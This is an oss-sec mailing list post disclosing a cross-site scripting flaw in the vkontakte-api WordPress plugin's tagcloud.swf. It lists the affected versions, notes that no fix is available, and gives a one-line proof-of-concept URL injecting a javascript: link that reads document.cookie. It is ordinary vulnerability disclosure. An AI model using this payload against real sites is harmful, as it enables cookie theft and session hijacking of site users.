oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability

From: Henri Salo <henri () nerv fi>
Date: Mon, 11 Mar 2013 09:44:33 +0200
Hello list members,

Plugin URL: http://wordpress.org/extend/plugins/vkontakte-api/
Affected file: tagcloud.swf 368b01e1728111f99d93ac5805d97abbb899a910
PoC: 
wp-content/plugins/vkontakte-api/swf/tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27>oss-security</a></tags>
Affected versions: 1.21, 1.22, 1.23, 1.24, 1.25, 1.26, 1.27, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.7

Currently no fix available.

--
Henri Salo

Attachment: signature.asc
Description: Digital signature

Previous By Date Next
Previous By Thread Next

Current thread: